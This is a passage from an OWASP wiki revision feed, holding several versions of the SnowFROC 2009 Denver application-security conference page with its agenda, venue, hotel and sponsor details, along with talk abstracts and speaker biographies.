''David Byrne & Charles Henderson, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Logistics==<br />
<br />
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]<br />
<br />
==Accommodations==<br />
<br />
OWASP has negotiated discounted rates with the Hotel Teatro. Rooms under the SnowFROC group rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room under the discounted rate, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC. The discounted rate will be available until Monday, March 2.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?f=q&hl=en&q=tivoli+denver&ie=UTF8&ll=39.74785,-104.990931&spn=0.040189,0.061626&z=14&iwloc=A map].<br />
<br />
By taxi:<br />
*taxi from the airport to venue is about $50 USD<br />
<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=55331Front Range OWASP Conference 20092009-02-23T22:28:57Z<p>Eduprey: /* Accommodations */</p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Logistics==<br />
<br />
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]<br />
<br />
==Accommodations==<br />
<br />
OWASP negotiated discounted rates with the Hotel Teatro. Rooms under the SnowFROC group rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room under the discounted rate, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC. The discounted rate will be available until Monday, March 2.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?f=q&hl=en&q=tivoli+denver&ie=UTF8&ll=39.74785,-104.990931&spn=0.040189,0.061626&z=14&iwloc=A map].<br />
<br />
By taxi:<br />
*taxi from the airport to venue is about $50 USD<br />
<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=SnowFROC_Cornell_Dickson_Abstract&diff=54897SnowFROC Cornell Dickson Abstract2009-02-18T18:30:42Z<p>Eduprey: /* The Speakers: Dan Cornell & John Dickson */</p>
<hr />
<div>==The Presentation: Vulnerability Management in an Application Security World==<br />
<br />
Identifying application-level vulnerabilities via penetration tests and code reviews is only the first step in actually addressing the underlying risk. Managing vulnerabilities for applications is more challenging than dealing with traditional infrastructure-level vulnerabilities because they typically require the coordination of security teams with application development teams and require security managers to secure time from developers during already-cramped development and release schedules. In addition, fixes require changes to custom application code and application-specific business logic rather than the patches and configuration changes that are often sufficient to address infrastructure-level vulnerabilities.<br />
<br />
This presentation details many of the pitfalls organizations encounter while trying to manage application-level vulnerabilities as well as outlines strategies security teams can use for communicating with development teams. Similarities and differences between security teams’ practice of vulnerability management and development teams’ practice of defect management will be addressed in order to facilitate healthy communication between these groups.<br />
<br />
==The Speakers: Dan Cornell & John Dickson==<br />
<br />
Dan Cornell has over ten years of experience architecting and developing web-based software systems. He leads Denim Group’s security research team in investigating the application of secure coding and development techniques to improve web-based software development methodologies.<br />
<br />
Dan was the founding coordinator and chairman for the Java Users Group of San Antonio (JUGSA) and is currently the San Antonio chapter leader of the Open Web Application Security Project (OWASP). He is a recognized expert in the area of web application security for SearchSoftwareQuality.com and the primary author of Sprajax, OWASP’s open source tool for assessing the security of AJAX-enabled web applications. <br />
<br />
<br />
John Dickson is a principal at Denim Group, Ltd.and a Certified Information Systems Security Professional (CISSP) whose technical background includes hands-on experience with intrusion detection systems, telephony security and application security. He has consulted with Fortune 500 clients, Department of Defense organizations and numerous Chief Information Officers regarding their organizations’ security programs and has served as Chief Information Security Officer for a major healthcare organization. <br />
<br />
John regularly speaks in front of numerous security groups including the Information Systems Security Association (ISSA) and the Information Systems Audit and Control Association (ISACA). He has also presented at several conferences including CSI 2007, the annual Computer Security Institute Conference, the Texas Regional Infrastructure Security Conference (TRISC) and ConSec 2006. He is a founder and chairman of the San Antonio Technology Accelerator Initiative (SATAI), a founder of the Alamo Chapter of ISSA and the Chairman Elect of the North San Antonio Chamber of Commerce. <br />
<br />
<br />
<br />
[[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|back to Presentation Agenda]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Bellis&diff=54896SnowFROC Abstract Bellis2009-02-18T18:16:01Z<p>Eduprey: /* The Speaker: Ed Bellis VP, CISO Orbitz Worldwide */</p>
<hr />
<div>==The Presentation: Doing more with less? : Automate or Die==<br />
<br />
The harsh economic climate has hit us all in some way. Budgets are trimmed and spending is down. We are continuously asked to do more with less, but how? Certainly the attackers aren’t spending less! Our web applications continue to grow in size and complexity. So what can an InfoSec team do to become more efficient and still effectively protect our applications?<br />
<br />
At Orbitz, our team took a hard look at where we were spending a lot of our time – the grunt work – and how we could spend less of it. After building out a fairly comprehensive vulnerability management program and using a lot of best in breed tools, we found ourselves with an overabundance of manual labor on our hands putting together the pieces of our vulnerability puzzle. After looking around the market space, we found nothing that could really help us with this growing problem. Low and behold, there’s a government set of standards now to put all this together. What the heck, let’s build it!<br />
<br />
==The Speaker: Ed Bellis VP, CISO Orbitz Worldwide==<br />
<br />
Ed Bellis is responsible for the protection and security of all information and electronic assets as well as compliance and ethics across the wide array of business units that make up Orbitz Worldwide on a global basis. These assets include Orbitz, CheapTickets, eBookers, Away.com, HotelClub, RatesToGo, AsiaHotels, and Orbitz for Business.<br />
<br />
With over 15 years of experience in information security and technology, Ed has worked with and been involved in protecting information assets at several Fortune 500 companies. Prior to joining Orbitz, Ed served as VP of Corporate Information Security for Bank of America within their Global Corporate and Investment Banking division. His credentials also include several security technology and management roles at organizations such as Ernst & Young, Ford Motor Company, and Young & Rubicam. Ed is a CISSP, CISM, a contributor to the ISM Community, and a member of ISC2, ISACA and the Chicago chapter of the ISSA.<br />
<br />
Ed is a frequent speaker at information security events across North America and Europe. Past talks have included venues such as The MIS Institute, The Association of Information Technology Professionals, Technology Executives Club, and the National Business Travel Association. <br />
<br />
[[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|back to Presentation Agenda]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Byrne&diff=54895SnowFROC Abstract Byrne2009-02-18T18:11:36Z<p>Eduprey: /* The Presentation: "Automated vs. Manual Security: You can't filter the stupid" */</p>
<hr />
<div>==The Presentation: "Automated vs. Manual Security: You can't filter the stupid"==<br />
<br />
Automated application security tools have been available for quite a while, but their manual counterparts are still doing quite well. This presentation will cover the relative strengths and weaknesses of both automated solutions, such as Web Application Firewalls (WAFs), source code review tools, and automated application scanners, and manual approaches, namely application penetration tests and manual code reviews.<br />
<br />
==The Speakers: David Byrne & Charles Henderson==<br />
<br />
David Byrne has almost a decade of experience in information security, specializing in web application penetration testing. Currently, he is a Senior Security Consultant in Trustwave’s SpideLabs division. Before joining Trustwave, David was the Security Architect at Dish Network. In addition to penetration testing, David has extensive experience working with developers and implementers to design security controls into applications from the ground up. He also has worked with governance and compliance groups to create security policies and standards documents.<br />
<br />
In 2006, David started the Denver chapter of OWASP. In 2008, he released Grendel (grendel-scan.com), an open source web application security scanner. David has spoken at many industry events, including Black Hat, DEFCON, Toorcon, and the Computer Security Institute’s annual conference. <br />
<br />
Charles Henderson is the Practice Manager of Trustwave’s Application Penetration Testing Group.<br />
<br />
[[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|back to Presentation Agenda]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Byrne&diff=54894SnowFROC Abstract Byrne2009-02-18T18:08:09Z<p>Eduprey: /* The Speaker: David Byrne */</p>
<hr />
<div>==The Presentation: "Automated vs. Manual Security: You can't filter the stupid"==<br />
<br />
==The Speakers: David Byrne & Charles Henderson==<br />
<br />
David Byrne has almost a decade of experience in information security, specializing in web application penetration testing. Currently, he is a Senior Security Consultant in Trustwave’s SpideLabs division. Before joining Trustwave, David was the Security Architect at Dish Network. In addition to penetration testing, David has extensive experience working with developers and implementers to design security controls into applications from the ground up. He also has worked with governance and compliance groups to create security policies and standards documents.<br />
<br />
In 2006, David started the Denver chapter of OWASP. In 2008, he released Grendel (grendel-scan.com), an open source web application security scanner. David has spoken at many industry events, including Black Hat, DEFCON, Toorcon, and the Computer Security Institute’s annual conference. <br />
<br />
Charles Henderson is the Practice Manager of Trustwave’s Application Penetration Testing Group.<br />
<br />
[[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|back to Presentation Agenda]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=54893Front Range OWASP Conference 20092009-02-18T18:04:06Z<p>Eduprey: /* Agenda and Presentations: 5 March 2009 */</p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | "Adobe Flex, AMF 3 and BlazeDS: An Assessment" (Tool Release!) <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter the stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Logistics==<br />
<br />
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]<br />
<br />
==Accommodations==<br />
<br />
OWASP negotiated discounted rates at one or more hotels near the conference venue. Please email snowfroc@owasp.org for questions regarding accomodation.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?f=q&hl=en&q=tivoli+denver&ie=UTF8&ll=39.74785,-104.990931&spn=0.040189,0.061626&z=14&iwloc=A map].<br />
<br />
By taxi:<br />
*taxi from the airport to venue is about $50 USD<br />
<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Grossman&diff=54892SnowFROC Abstract Grossman2009-02-18T18:03:12Z<p>Eduprey: /* The Presentation: "Top Ten Hacks of 2008: What's possible, not probable" */</p>
<hr />
<div>==The Presentation: "Top Ten Web Hacking Techniques of 2008: What's possible, not probable"==<br />
<br />
Top Ten Web Hacking Techniques of 2008:<br />
"What's possible, not probable"<br />
<br />
